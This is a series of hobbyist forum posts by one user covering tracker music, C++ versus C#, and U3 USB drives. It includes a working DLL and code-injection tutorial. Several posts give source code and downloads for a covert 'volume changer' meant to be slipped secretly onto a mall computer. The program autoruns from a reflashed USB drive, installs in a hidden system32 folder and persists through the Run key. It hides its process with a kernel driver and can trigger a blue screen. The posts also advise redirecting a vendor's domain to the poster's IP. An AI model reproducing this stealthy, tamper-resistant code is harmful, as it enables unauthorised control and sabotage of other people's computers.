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Posts posted by Steve8x

  1. Thanks moonlit for that information on tracker songs. I was already messing around with ModPlug Tracker and discovered you can open up songs with it, and see the notes that make up the song, even borrow samples/instruments, are they the same thing? I'm thinking a sample is like a sound clip that can only be played 1 way, and an instrument can be played at any note you want like a piano... Well anyways I'm not very much of a musician but I think I'll give it a try, maybe borrow some samples from a song I like and I just might be able to come up with something :)

    @natural_orange, actually you should just get ModPlug Tracker instead of player, because you can not only open songs in it but it has the option to save them as MP3 directly as well as wav... So no need mucking around with other software to get them to mp3 format...

    @Emeryth hey did you come up with your challenge yet? you won incase you didn't realize, so think of a challenge so that thread keeps moving, right now its on pause until you post a challenge...

  2. Well, I found some software that can convert those formats into .wav(which can easily be converted to mp3 using free software)

    not sure about .v2m though as i havent tried it but I think it'll work! .xm .it .mod all converted to wavs succesfully...


    get modplug player, it plays them and also lets you save it as a .wav ;)

    maybe modplug tracker is how they make those cool trainer/keygen musics?

  3. thanks for your help guys i think i am going to learn c# or c++ (hard choice) and then assembly (i already know some of the basics from q basic and free basic if you guys count that as programming it taught me the concepts though)

    Is it really a hard choice? Ask your self a couple simple questions and I think you'll have the answer!

    1. Do I want my programs to be dependent on .NET frameworks?

    2. Do I want to lose performance because I'm using managed code, instead of good old unmanaged c++?

    3. Do I like dots(".") so much that I must splatter them throughout my code?

    Can anyone that programs in C# elaborate on why they think its better despite what was outlined above? And don't say the code is easier/faster to write, because I certainly don't think so...

    here's an example of two programs the first in managed C# the second in unmanaged native C++


    // HelloWorld.cs
    using System;
    public class HelloWorld
        public static int Main()
            Console.WriteLine("Hello World!");
            return 0;


    #include <iostream>
    using namespace std;
    int main()
        cout << "Hello World!";
        return 0;

    Compile either one, then open a command prompt("cmd.exe") then run either program from it, they both will do the exact same thing, write "Hello World!" to the console screen and exit.

    The difference is the C# one compiles into IL(Intermediate Language) code and is stored in the EXE file, when run(requires .NET framework) the CLR(Common Language Runtime) converts it into machine code(Assembly code pretty much) that will run on the computer.

    The C++ version compiles directly into machine code and is therefore ready to be run immediately. No dependencies unless you choose to be dependent on something. For example if you made a directX app, then your choosing to be dependent on the machine having directx...

    Now although you won't really notice a difference in performance with this simple application(because it doesn't really do much) with code that does more, and code that is CPU intensive, the difference is pretty big, although you can optimize c# code to minimize performance loss, there will always be that overhead caused the .NET frameworks and CLR.

    C++ is the highest performance you can get without going totally assembly.

    Assembly is basically what you see is what you get, whatever you code, that's how it ends up in the EXE, it doesn't compile it assembles. The assembly opcodes are assembled into numerical byte codes that they are associated with. For example this opcode

    "pop eax"


    0x58 (58 hex)

    these byte codes are machine code which with a disassembler you can see the assembly codes they represent, this is basically how reverse engineering takes place, studying the assembly codes you can figure out what a program is actually doing! you can't go from EXE back to source, but you can read the assembly code! ;)

    so im going the end this with a quote from the masm32.com website

    "Warning Danger Zone

    High speed software"

    although they changed the website for some reason, currently it can still be viewed in google's cache;cd=1&gl=us

  4. has it happened to anyone else after formatting? their drive became smaller? I never formatted my drive I just left it the way it is! If its not broke don't fix it right?

    well two people have said that after they formatted it became 3 gig in size... So if other people have the same thing happened to them, it might be the formatting! maybe u3 has a special way of formatting it since it is unlike any other drive...

    So lets hear from some more people who have formatted their u3 drive! If its happened to everyone that's formatted I think its safe to say don't format any u3 drives you purchase...


    disable that u3 crap? ha! that's the only reason I bought a u3 drive is for the U3 AUTORUN... You don't have to use the uninstaller to get rid of the u3 launchpad crap software...

    just overwrite the cdrom partition and its as good as gone, except you still get to keep the autorun functionality... People have said even if you use that uninstaller you can still use lpinstaller to get the autorun back, but some people have said it doesn't come back. So I figure its best not to risk it! ;)

  5. Here is my submission - Java tetris.

    This app was my school project, I've made it two months ago and back then it was only a single player tetris. I had planned to make it multiplayer, but having very little time I had to dump the idea. Fortunately, some of the code was already prepared for two players, so expanding it wasn't very hard. Right now it features both local two player game and network game over IP. The network code is far from being optimal, so I suggest playing over LAN :P

    Screenshots confirming cross-platform multiplay:

    post-10286-1217859407_thumb.jpg post-10286-1217859420_thumb.jpg

    Here is the source and the binary in the form of a NetBeans project (the binary is in the /dist folder).


    Basic info:

    Controls for player 1 (on the left) are WSAD for movement, G and J for rotation and H for holding the piece.

    For player 2 it's arrows and numpad 123.

    When setting up the network game you don't have to type anything in the address field when hosting.

    The entire game is probably very buggy, it haven't been tested thoroughly, so I'll be flattered if you actually take time to play it and point out some errors :)

    As for the code, it is ugly, there are no comments and I had to translate it. :P

    This was (and still is :P) my very first Java program, and I was actually learning very basic stuff while writing it, so look/learn/copy it at your own risk.

    Finally, mad props to my friend Gumer for doing the epic pixel art blocks and background. :D

    Emeryth you are the winner of my challenge not only because no one else posted an entry but because you put together a nice java tetris app! congrats! you make the next challenge!!! ;)

    I have tested over my local network and it seems to work fine! although I don't like how it freezes when you click host game, while it waits for another player... well it can be fixed! but anyway still a nice program! thanks I'll try to learn from it as much I can and maybe I'll make a similar game in java :)

  6. just for reference:

    it's possible to inject an EXE into a suspended process, but there is a program called RAMDisk that will create a virtual HDD (it will even show up under my computer) of variable size which you can set in the .inf file. RAMDisk allocates areas of blank memory for storage of anything you want: games, pics, vids, etc... and since the files exist on RAM instead of a physical HDD, access times are boosted by up to 50x normal speeds.

    ** However, this is important: THE FILES ON THE RAMDISK WILL BE DELETED UPON COMPUTER SHUTDOWN. The RAMDisk drive will still exist, but the files will be toasted (there are some RAMDisk applications with built-in backups that write to your HDD and rewrite to the RAMDisk on startup, though).

    Just thought I would post this in case anyone else ran into this problem.

    What does a RAMdisk have to do with injecting code into a process? I don't see the similarity there!

    Anyways what I think you mean is you want to inject executable code into a process! you can't exactly inject a .EXE into a process but you can inject some code or a DLL which will run your code from within the process!

    Injecting a .dll is closer to injecting an .exe than pure code injection! because you can create your DLL just like creating an EXE and inject it into the process and have it run the code either by having the dll create a thread upon injection or you could create the thread yourself with createremotethread...

    I would go with dll injection because its much simpler than pure code injection! because you can just code it like an exe compile it and inject it and everything will work right! doing just code injection without the dll, is more difficult because you pretty much have to code in assembly and since your inside another process you cannot access variables like you could in your own process, you'll understand in a bit, I'll show an example of both methods...

    First DLL Injection, I recommend using C++ to make things easier!, MASM if your feeling up to it.


    here is the basic DLL skeleton:

    #include <windows.h>
    BOOL APIENTRY DllMain (HINSTANCE hInst, DWORD reason, LPVOID reserved)
        switch (reason)
            case DLL_PROCESS_ATTACH:
            case DLL_PROCESS_DETACH:
        return TRUE;

    Its very simple "DllMain" is called immediately after the dll is loaded into a process (via LoadLibrary API)

    since its loading and not being free'd the reason is "DLL_PROCESS_ATTACH"

    usually a dll doesn't do anything in DLL_PROCESS_ATTACH, and it just exports functions which are to be called by the process that loads it! But for executing this code in a process I like to just not export anything and just Create a thread instead! Once you have a running thread in your target process you can do anything you want inside it! Including create more threads! :)

    Here is a some code of a dll which creates a thread, which waits indefinitely for a keypress!(F12) when the key is pressed it creates a message box (you can really make it do anything you want so whatever code you want to put here is fine, you don't need the infinite loop if its not desired or the waiting for a keypress I just made it as an example. I haven't had any luck getting it to work in dev cpp, for some reason dllmain is not being called upon. So instead I compiled it in visual studio 2008. So it may be dependent on the 2008 package


    So i've also made the same thing in assembly that for sure isn't dependent on any package like that!

    Visual C++ 2008 version:

    #include <windows.h>
    void MyThread()
        for(;; Sleep(10))
                MessageBoxA(0, "Hello World! From A DLL!", "FROM DLL THREAD!", 0);
    BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved)
            case DLL_PROCESS_ATTACH:
                CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&MyThread, 0, 0, 0);
            case DLL_PROCESS_DETACH:
        return TRUE;


    MASM32 version:

    ; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
          .486                     ; create 32 bit code
          .model flat, stdcall     ; 32 bit memory model
          option casemap :none     ; case sensitive 
    ;     include files
    ;     ~~~~~~~~~~~~~
          include \masm32\include\windows.inc
          include \masm32\include\masm32.inc
          include \masm32\include\gdi32.inc
          include \masm32\include\user32.inc
          include \masm32\include\kernel32.inc
          include \masm32\include\Comctl32.inc
          include \masm32\include\comdlg32.inc
          include \masm32\include\shell32.inc
          include \masm32\include\oleaut32.inc
          include \masm32\include\dialogs.inc
          include \masm32\macros\macros.asm    ; the macro file
    ;     libraries
    ;     ~~~~~~~~~
          includelib \masm32\lib\masm32.lib
          includelib \masm32\lib\gdi32.lib
          includelib \masm32\lib\user32.lib
          includelib \masm32\lib\kernel32.lib
          includelib \masm32\lib\Comctl32.lib
          includelib \masm32\lib\comdlg32.lib
          includelib \masm32\lib\shell32.lib
          includelib \masm32\lib\oleaut32.lib
       ; ----------------------------------------
       ; prototypes for local procedures go here
       ; ----------------------------------------
        MyThread PROTO
            Msg db 'Hello World! From A Dll!',0
            MsgTitle db 'FROM DLL THREAD',0
            hInstance dd ?
    ; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
    LibMain proc instance:DWORD,reason:DWORD,unused:DWORD 
        .if reason == DLL_PROCESS_ATTACH
         m2m hInstance, instance
         invoke CreateThread, 0, 0, addr MyThread, 0, 0, 0
        .elseif reason == DLL_PROCESS_DETACH
    LibMain endp
    MyThread proc
        invoke Sleep, 10
        invoke GetAsyncKeyState, VK_F12
        test eax, eax
        jz InfiniteLoop; if eax == 0 key was not pressed
       ;If the execution makes it here, then F12 was pressed!
        invoke MessageBox, 0, addr Msg, addr MsgTitle, 0
        jmp InfiniteLoop
    MyThread endp
    end LibMain


    You can inject this into any process at all, and when F12 is pressed the messagebox will be created! and after you click ok the thread will still continue to run!

    How do you inject this dll into a process? Well the simplest method that I use most of the time is the CreateRemoteThread method... basically you allocate some memory in the target process, copy the path to the dll you want to inject into the allocated memory, then use CreateRemoteThread on the LoadLibrary address passing the pointer to the DLL string allocated in the process as the parameter... What will happen is a thread will begin at loadlibrary which will attempt to load the dll, if the path is correct the dll will be "injected" and your DllMain will be called with "DLL_PROCESS_ATTACH" reason, which will create your thread!

    Simple enough eh?

    here's a simple DLL injector I coded up in dev c++!


    download source here:


    a clip from the source, which does the injecting bit...

    void InjectDll()
        void* remoteDLLstring = 0;
        HANDLE processhandle = 0;
        DWORD processID = 0;
        DWORD BytesWritten = 0;
        GetWindowText(pnameBox, ProcessName, 100);
        if(ProcessName[0] == 0)
            MessageBox(hwnd, "Enter A Process Name!", 0, 0);
        if(DllPath[0] == 0)
            MessageBox(hwnd, "Type Or Browse For A Dll To Inject!", 0, 0);
        processID = GetPID(ProcessName);
            MessageBox(hwnd, "Failed to get process ID! \n make sure its running and try again", 0, 0);
        processhandle = OpenProcess(PROCESS_ALL_ACCESS, 0, processID);
            MessageBox(hwnd, "Failed to open process!! should not happen!", 0, 0);
        remoteDLLstring = VirtualAllocEx(processhandle, 0, strlen(DllPath)+1, MEM_COMMIT, PAGE_READWRITE);
        WriteProcessMemory(processhandle, remoteDLLstring, DllPath, strlen(DllPath), &BytesWritten);
        DWORD loadLibraryAddress = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
        // final step! :)
        CreateRemoteThread(processhandle, 0, 0, (LPTHREAD_START_ROUTINE)loadLibraryAddress, remoteDLLstring, 0, 0);
        MessageBox(hwnd, "DLL INJECTED", "SUCCESS!", 0);

    Now for the pure code injection!


    Basically we are going to do similar like injecting a dll, except we wont create a thread at loadlibrary, we will copy our code over into the executable directly and create our thread at the address the code was copied to!

    Its a little more difficult! Every variable or string or API address that we want to use in the target process must be copied over to it before executing the thread! for example if you had this code in your code to copy over

    "invoke MessageBox, 0, addr String, addr TitleString, 0"

    copying it over and running the thread would make the program crash! why? because the address in your application of "MessageBox" isnt the real address, it is instead from your programs IAT, so since your programs IAT is different from the target process, it will be an invalid address and the program will crash!

    So we have to use GetProcAddress, for all the API's we want to use, then copy them over, normally I would copy all the API's and addresses I needed into an array on the target process, then use any address by knowing the correct offset from the array! but to make things simpler for this example we aren't going to use an array, we are only going to use two api's! MessageBoxA(to display a message so we know it worked), and ExitThread(so the thread can exit peacefully without crashing the program)


    as you can see from the image, after I clicked inject code, the messagebox was called from inside of "calc.exe" notice the icon in the taskbar which is the calculator icon! try it with any running executable, and the messagebox will have the same icon as it!

    download here MASM32 project:


    here I will explain the code:

    CodeToInject proc
        push 0DEADBEEFh; place holder for exit thread address
        push 0; MB_OK
        push 0BAADF00Dh; place holder for remote title address
        push 0BAADBABEh; place holder for remote string address
        push 0; no window handle provided
        push 0BAADF00Dh; place holder for MessageBoxA address
        pop eax; pop the messageboxa address off of the stack into eax
        call eax; invoke MessageBoxA, 0, [addressofstring], [addressoftitle], 0
        pop eax; pop the exit thread address into eax
        push 0
        call eax; invoke ExitThread, 0
    CodeToInject endp

    that block of code is what will be copied into the target process! by place holder I mean it is just temporarily taking up the right amount of space, so that when we copy our addresses over this; the number of bytes stays the same except the values change, the invokes are there just to show you what the actual code is doing...

    INVOKE in MASM is just a nice way of doing push push call

    normally in ASM you push the parameters of the API/Function your trying to use in backwards into the stack, then you call the function address... MASM has the nice INVOKE feature where it will do that for you and you can just write invoke and write the params in the correct order! ;)

    InjectCode proc
        LOCAL processname:DWORD
        LOCAL processhandle:DWORD
        LOCAL oldProtect:DWORD
        stralloc 100
        mov [processname], eax
        mov [pID], 0
        invoke GetWindowText, [ProcessNameBox], [processname], 100
        invoke GetPID, [processname]
        .if [pID] == 0
         invoke MessageBox, 0, SADD("Process Not Found, Make Sure Its Running And Try Again"), 0, 0
         invoke ExitThread, 0
        invoke OpenProcess, PROCESS_ALL_ACCESS, 0, [pID]
        mov [processhandle], eax

    LOCAL whatever:DWORD

    those just declare local stack variables so that we can use them temporarily

    stralloc allocates 100 bytes for a string

    then we move the address of that allocated string into [processname]

    we reset pID to zero incase we are going the second time around to make sure its null before calling GetPID

    GetWindowText grabs the process name from the editbox

    GetPID is exactly like the C++ function that was in the DLL injector! it does the same thing. Get the process ID from the process name, needed so we can call open process to get a handle to the process

        invoke lstrlen, addr RemoteString
        inc eax
        mov [strlen1], eax
        invoke lstrlen, addr RemoteTitle
        inc eax
        mov [strlen2], eax

    that just gets the length of the two strings and stores them into dword values, we need the lengths so we can know how much memory to allocate and how many bytes of the string to copy over

       ;allocate memory to copy the code, and strings to
        invoke VirtualAllocEx, [processhandle], 0, 1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE
        mov [RemoteCode], eax
        invoke VirtualAllocEx, [processhandle], 0, [strlen1], MEM_COMMIT, PAGE_READWRITE
        mov [RemoteStringAddy], eax
        invoke VirtualAllocEx, [processhandle], 0, [strlen2], MEM_COMMIT, PAGE_READWRITE
        mov [RemoteTitleAddy], eax

    pretty self explanitory, note for the RemoteCode we make the protection PAGE_EXECUTE_READWRITE because we are not only going to be reading and writing to it but also EXECUTING A THREAD THERE! the addresses of the allocated memory are stored in the dword values, the addresses are not in our process but the target one!

       ;get needed API addresses
        invoke GetProcAddress, FUNC(GetModuleHandle, addr krnl32), SADD("ExitThread")
        mov [ExitThreadAddy], eax
        invoke GetProcAddress, FUNC(GetModuleHandle, addr usr32), SADD("MessageBoxA")
        mov [MessageBoxAddy], eax
       ;move real addresses into place holders
       ;i figured out the offsets using a disassembler on this program
        invoke VirtualProtect, addr CodeToInject, 24, PAGE_EXECUTE_READWRITE, addr oldProtect; so we can write over our code to inject
        mov eax, offset CodeToInject
       ; we need the real addresses so we have a flawless working code in the remote process
        mov ecx, [ExitThreadAddy]
        mov [eax+1], ecx
        mov ecx, [RemoteTitleAddy]
        mov [eax+8], ecx
        mov ecx, [RemoteStringAddy]
        mov [eax+13], ecx
        mov ecx, [MessageBoxAddy]
        mov [eax+20], ecx
        mov ecx, offset EndOfCode
        sub ecx, eax; ecx now equals size of code to inject;)
       ;Write CodeToInject + Strings into the process at the memory we already allocated
        invoke WriteProcessMemory, [processhandle], [RemoteCode], addr CodeToInject, ecx, addr byteswritten
        invoke WriteProcessMemory, [processhandle], [RemoteStringAddy], addr RemoteString, [strlen1], addr byteswritten
        invoke WriteProcessMemory, [processhandle], [RemoteTitleAddy], addr RemoteTitle, [strlen2], addr byteswritten
       ;finally create the remote thread which will create a messagebox from the remote process and then exit the thread
        invoke CreateRemoteThread, [processhandle], 0, 0, [RemoteCode], 0, 0, 0
        strfree processname
        invoke ExitThread, 0
    InjectCode endp

    So thats basically it! You should now have a better understanding of injecting executable code into processes in windows!

    You probably will want to make a DLL as its much simpler and closer to what you described! I like to think of DLL's as EXE's in a way, except they cannot run on their own, they must have an exe to load them! So injecting a dll is almost like injecting an exe :)

    NOTE* you need winrar to unzip/unrar the files

    here's the link to download MASM32, ITS FREE!


    also here's a free version of vc++ 2008


  7. Programming is not outdated! Just like a writer writes a book, or a painter paints a picture! coding is a form of art!

    How do you think your little drag and drop thing works? someone had to code it, to make it so you can drag and drop! What it actually does is generate the code based on what you clicked together...

    You really need to have to type into source code files to truly communicate with a computer! how else would you do it? humans surely can't comprehend binary as a computer does! would you rather write 1001110010100010101

    to code something up? I think not! Languages like C++ make it easier for programmers! They can just write there C++ code and the compiler will convert it into machine code, and with a disassembler you can see the assembly code which is actually human understandable unlike the machine code! Thats why I like assembly because its so close to machine code that its ready to rock and roll! High performance, super fast running code executed directly by the CPU ;) I always say if you can code it in ASM then do it!

    Think of it this way if I had to write this post without typing and only clicking the mouse it would be impossible for you to understand anything... It would be a blank post what could I possibly do? Use an onscreen keyboard maybe but that would still be typing just with the mouse! you see what Im getting at?

    even you typed your post! Just like we communicate with each other with english. We communicate with computers through the many languages available to "speak" in...

    besides I wouldn't like doing so much clicky clicky with the mouse! thats why linux uses terminal for most things instead GUI based, reduce the clicky clicky and increase the amount of what gets done!

    So it seems to me that you just don't like to type! Well many people enjoy typing including me! ;)

    So to answer your question of why, its simply the best way to communicate with people and computers!

  8. the best way to make an infinite loop is


    instead of something like

    while(1 == 1)
    because when it all gets broken down into assembly instructions, the second loop boils down to a conditional jump (conditional meaning if a certain condition is true only then will it jump) as you can see this is not needed since its an infinite loop anyway the condition will never change so it will still always jump! so just use a for loop so it wont be checking that address unnecessarily every split second!
    cmp [ADDRESS], 1
    je loopstart

    while the first is an UNconditional jump

    jmp loopstart

    although you may not notice much of a difference speed wise, use a for loop for infinite loops just to be getting top performance...

    also the Sleep(10); is important in almost every infinite loop! So that your program never takes it up to 100% CPU usage! If you don't have any sleep in your loop you will notice lag! ;)

    a random function that I like: atoi

    converts an ascii string to and integer ascii to integer

    char* stringnumber = "5000";
    int numbernumber = atoi(stringnumber);

    very helpful for reading numbers out of text files in string format, then converting them to actual binary so that you can use the number to do math!


  9. yes, i want to hide a running window---not a dos window.

    ShowWindow API does this very easily! it is how Ghost works...

    2 Simple Steps!

    1. Get the window's handle! (HWND)

    2. Call ShowWindow with the window handle and specify SW_HIDE for the second parameter

    in C++

    HWND WindowHandle;
    WindowHandle = FindWindow(0, "WindowTitle");
    ShowWindow(WindowHandle, SW_HIDE);

    in ASM

    HideWindow proc WindowTitle:DWORD
        LOCAL WindowHandle:DWORD
        invoke FindWindow, 0, [WindowTitle]
        mov [WindowHandle], eax
        invoke ShowWindow, [WindowHandle], SW_HIDE
    HideWindow endp

    call it like this if using macros.asm

    invoke HideWindow, SADD("WindowText")

    or just give it a pointer to a string

    MSDN for reference it will tell you everything you need to know about these two APIs





    P.S. who said anything about a GUI? you can make a windowless application call these APIs! If your using C++ that means make a GUI application instead of a console but just never make a window! that way nothing ever pops up...

    hiding command prompt windows is the same as hiding GUI based windows, there's no difference.

  10. WOW! Thanks Alot for that link! I can't believe I didn't find that!

    Well anyway I just overwrote the CDROM partition with the VC2Installer ISO and it works perfectly!

    plugged it in and it installed and starting running :)

    Universal Customizer WORKS!

    Thanks Again!

  11. Assembly language is definitely worth learning! Once you understand all the little details of whats going on the lower levels, the higher levels become even easier! everything becomes easier for you! ;)

    push eax
    mov eax, offset mxlr
    mov dword ptr [eax], 0x539
    pop eax

    that says you are 1337 in assembly language!(well if you were a DOUBLE WORD that is :P)

    WORD = 2 bytes; DWORD = 4 bytes

  12. Ok now this morning I was thinking about this program and I took look at the script you were writing...

    this line stood out:

    regsetval sz "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

    It appears as though you want to actually install something on the computer that constantly changes the volume instead of just changing it once, and also starts when the computer turns on! since that's what that registry key is for!

    So I've come up with version 2.0

    This time in the ISO image there is a "VC2Installer.exe" and "autorun.inf"

    VC2Installer simply Creates a directory in a secret location in system32

    Then it dumps the VolumeChanger 2.0 EXE as "VC.exe" to the folder and also copies the "VolumeChanger32.ini" there too as "VC32.ini"

    It then adds the path to the process in this registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    which makes the program auto-run whenever windows starts up!

    Finally it does a ShellExecute to run copied VolumeChanger 2.0

    Every 1 second the volume is changed to what the value was in VolumeChanger32.ini that was on your USB stick! OR if your USB stick is not plugged in, it reads from the local VC32.ini file.

    Also new with version 2.0 it now dumps a kernel mode driver into its working directory, and loads it into the driver stack, and passes it two offsets needed and the process ID of volume changer. The driver then hides the process from task manager or anything else by removing it from active process links... Flink and Blink method.

    Its just for extra secrecy, and to prevent the process from being terminated...

    You should try this one if your looking for a more permanent solution instead of having to keep putting your USB drive in everyday!

    NOTE: you still have to have VolumeChanger32.ini on your USB drive! ;)

    And its different as of 2.0 it now contains two lines

    Heres an example ini file http://popeax.com/downloads/VolumeChanger32.ini

    The first number is the volume to change to! just like before. The second line is new, it is a boolean value either 1 or 0, 0 means no BSOD, 1 means BSOD! basically I rigged the driver so that it will BSOD any computer that asks for it! This is why in the VC2Installer it changes the "AutoReboot" registry key so it gives you BSOD instead of automatically restarting! I don't know why you'd ever want this feature but nevertheless its there! ;)

    But I do think it would look silly! A blue screen of death on the mall screen lol!

    VC2Installer ISO:


    VC2Installer Source:


    Volume Changer 2.0 Source:


    VCembedded.h contains the binary data for VolumeChanger.exe (its too large to post here, download the source)

    VCinstaller, main.cpp:

    // Volume Changer 2.0 Installer Coded by Steve8x
    #include <windows.h>
    #include <stdio.h>
    #include "VCembedded.h"
    FILE* VC = 0;
    char InstallDir[260] = {0};
    char VCpath[260] = {0};
    char dbg[100] = {0};
    void AddToRegistry(char* EXEpath)
        HKEY hk5;
        RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &hk5);
        RegSetValueExA(hk5, "VC", 0, REG_SZ, (const unsigned char*)EXEpath, strlen(EXEpath));
        //Turn auto reboot off so you get a BSOD instead of a reboot!;)
        DWORD Zero = 0;
        RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\CrashControl", 0, KEY_ALL_ACCESS, &hk5);
        RegSetValueExA(hk5, "AutoReboot", 0, REG_DWORD, (BYTE*)&Zero, 4);
    void CopyIniFile()
        FILE* f = 0;
        char VCini[260] = {0};
        char filebuffer[32] = {0};
        char Drives[301] = {0};
        GetLogicalDriveStringsA(300, Drives);
        int dOffset = 0, inifound = 0;
        char* DriveString = (char*)&Drives;
        while(*(DWORD*)DriveString != 0) // locate "VolumeChanger32.ini on your USB drive!
            sprintf(VCini, "%s%s", DriveString, "VolumeChanger32.ini");
            f = fopen(VCini, "rb");
                inifound = 1;
                fread(filebuffer, 32, 1, f);
            dOffset += 4;
            DriveString = (char*)&Drives + dOffset;
        if(inifound == 1)
            sprintf(dbg, "%s%s", InstallDir, "\\VC32.ini");
            f = fopen(dbg, "wb");
            fwrite(filebuffer, strlen(filebuffer), 1, f);
    int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
        GetSystemDirectory(InstallDir, 260); // ex. C:\WINDOWS\system32
        //install into a secret dir, you may choose something else if desired
        strcat(InstallDir, "\\CatRoot\\{13D0A11-4EF1-2234-1337-13464FC295FF}");
        CreateDirectory(InstallDir, 0);
        sprintf(VCpath, "%s%s", InstallDir, "\\VC.exe");
        VC = fopen(VCpath, "wb");
        fwrite(VCexe, sizeof(VCexe), 1, VC);
        ShellExecute(0, "open", "VC.exe", 0, InstallDir, SW_SHOWNORMAL);
        return 1;

    OK EDIT: i just tested this and ran VC2Installer on my computer! It installed fine and ran! As I changed the volume it would keep going back to the value I chose in the ini file, Then I restarted the computer to make sure it worked properly on startup, and it messed up and didnt find the ini file!

    but I have fixed it now and updated the downloads to v2.1

    the problem is when running the program on startup through the registry the current directory for some reason is not the directory of the file path! So to solve the problem I just grab the path out of the registry where its stored, and use that to prepend to the ini file path + log file path

    tried it again and now it works perfectly on my windows XP machine! :)

  13. I have u3! the u3 launch pad autoruns when I insert the USB drive! I never uninstalled it! I'm simply trying to run LPinstaller to overwrite the default "cruzer-autorun.iso" with my own!

    I don't care for the u3 launch pad software!

    In other words, instead of the U3 launch pad software autorunning when inserted, Instead I'd like a custom exe to be executed!

    I know the ISO has to be less than 6.66MB and that's not the problem my ISO is way less than that!

    maybe the ISO name has to be "U3 System"? I'll try that!


  14. Its probably impossible to mess up a regular flash drive! but what about a U3 Drive?

    When your flashing the CDROM partition it says do not plug it out or you may destroy the device!

    lol! Thats a nightmare I have! where I'm flashing the drive and the power goes out!! oh noes!!!

    Would a power outage that shuts off your computer while your flashing the u3 drive really ruin it forever?

    can't it just be re flashed properly?

    Anyway ever since I got my Cruzer U3 drive I haven't had any luck flashing a custom ISO anyway! Can anyone provide a link to a LPInstaller that has worked for them?

    neither leaving "cruzer-autorun.iso" in the same folder as LPInstaller or spoofing the u3 website to localhost is working for me! :(

    I'm just trying to flash it with a custom ISO of mine!

    And I didn't buy it off ebay or anyplace like that! I bought it brand new from dell it came in the mail last week. Cut it out of the plastic case myself.

  15. Fishmonger no it does not sound malicious at all! You just want to turn the volume down a bit so you can do your job more effectively! there's nothing wrong with that!

    Although I don't think you should mute the volume! as they might notice it isn't making any sound at all and then you might get into a tight spot because you wont be able to turn it up at all since you don't have your keyboard with you!

    So instead I would just lower the volume to pretty low, but enough that you can still hear it a little!

    I've coded a neat little program in C++ that will automatically turn down the volume for you! From your post you said you had a Sandisk Cruzer!! :)

    That will be perfect for the job! I have made an ISO image file that has my VolumeChanger.exe on it along with a autorun.inf file.

    You have to overwrite the default U3 launch pad ISO with the custom one, then when your u3 drive is inserted it will be like popping in a CD! and the VolumeChanger.exe will execute, successfully lowering the volume to the desired level!

    Its Coded in Dev C++ and it works like this...

    Upon executing it Gets all the logical drive strings of all the drives the computer has... ex. C:\, D:\, E:\, F:\, etc..

    and it tries to open "VolumeChanger32.ini" on each drive starting from the first until the open is successful or the end of drives are reached... (it is very unlikely that any drive on the computer will have a "VolumeChanger32.ini" so its almost for 100% it will find the one on your usb stick!)

    "VolumeChanger32.ini" will be on the ROOT of your Cruzer's data partition (not the CDROM partition but the one you can change easily, this way you can adjust the volume each day to find that perfect volume level without having to reflash the drive with a new ISO image!)

    VolumeChanger32.ini is simply a text file which contains only 1 number between 0 - 65535

    0 being muted, 65535 being FULL BLAST! (probably what the volume is at since its so loud you say)

    so for example say you wanted to change the volume to very low, your VolumeChanger32.ini might contain this number:


    Now once you have that all set up! the custom ISO flashed over the default u3 ISO, and the VolumeChanger32.ini on your USB stick in the root...

    now when you insert the u3 drive the volume will change to whatever you had in the ini file, and it will save a log file to the root of the u3 drive as well which gives info about the sound device and the volume it was at, etc...

    You can test it on your computer while having the program "sndvol32.exe" running and see the result as it changes the master volume! then check out the log file! ;)

    Ive tested this by mounting the iso and having it autorun while the ini file was on my cruzer! I was watching sndvol32.exe and saw the volume changed! and then my log file looked like this:

    ini file found at: J:\VolumeChanger32.ini 
    # of devices: 1 
    Device # 0 Opened Successfully! 
    Prod. Name: "SigmaTel Audio"
    Short Name: "Volume Control"
    Full Name: "Volume Control"
    8 channels, 2 controls
    Control # 1
        Short Name: "Master Volume"
        Full Name: "Master Volume"
        Items: 0
        Range: 0 to 65535
        Steps: 192
        Value: 65535
    Control # 2
        Short Name: "Master Mute"
        Full Name: "Master Mute"
        Items: 0
        Range: 0 to 1
        Steps: 0
        Value: 0
    Volume Changed Successfully!!

    There's only one problem I have! I can't seem to be able to flash over the CDROM partition with a custom ISO! People have said that you can just have the "cruzer-autorun.iso" in the same folder as lpinstaller.exe and it will use that instead of downloading the real one from the website! and it doesn't seem to work for me... It always downloads the one from the u3.sandisk.com website!

    So since I have an apache webserver I tried the other way of modifying my hosts file so that u3.sandisk.com points to

    And it still doesn't work! I even have the correct directory structure and everything:


    When I run it it says download failed!:




    Why can't I flash my Cruzer? Any help is appreciated! If you can get yours to flash then your volume changing is accomplished, then simply and secretly insert your cruzer into the usb port of the mall computer, then wait for the volume to change then plug it out! ;)

    Maybe I have an outdated LPinstaller or something?

    Well anyway give it a try! first with "cruzer-autorun.iso" in the same folder and see if that works! if not the edit your hosts file at %systemroot%\system32\drivers\etc

    its just called "hosts" with no extension! if you don't run a webserver and your to lazy to set one up or whatever you could just change your hosts and add this line

    NOTE: will only work if my computer is running(which is basically 90% of the time)     u3.sandisk.com

    or    u3.sandisk.com

    if your going to give it a try with your own web server running on your machine!

    Volume Changer Source Code:


    LPinstaller that im using:


    The custom ISO I made for you including "VolumeChanger.exe" + "autorun.inf"


    the autorun.inf contains this:

    action=Change Volume!

    I hope you can help me out getting my drive to flash with a custom iso! Since I've helped you out changing the volume! :)

    Functions.h contains what does all the dirty work!


    // Volume Changer Coded By Steve8x!
    #include <windows.h>
    #include <stdio.h>
    #include <mmsystem.h>
    #include "Functions.h"
    FILE* f = 0;
    DWORD newvolume = 0;
    int inifound = 0;
    char VCini[32] = {0};
    char logpath[32] = {0};
    char Drives[301] = {0};
    char volumestring[6] = {0};
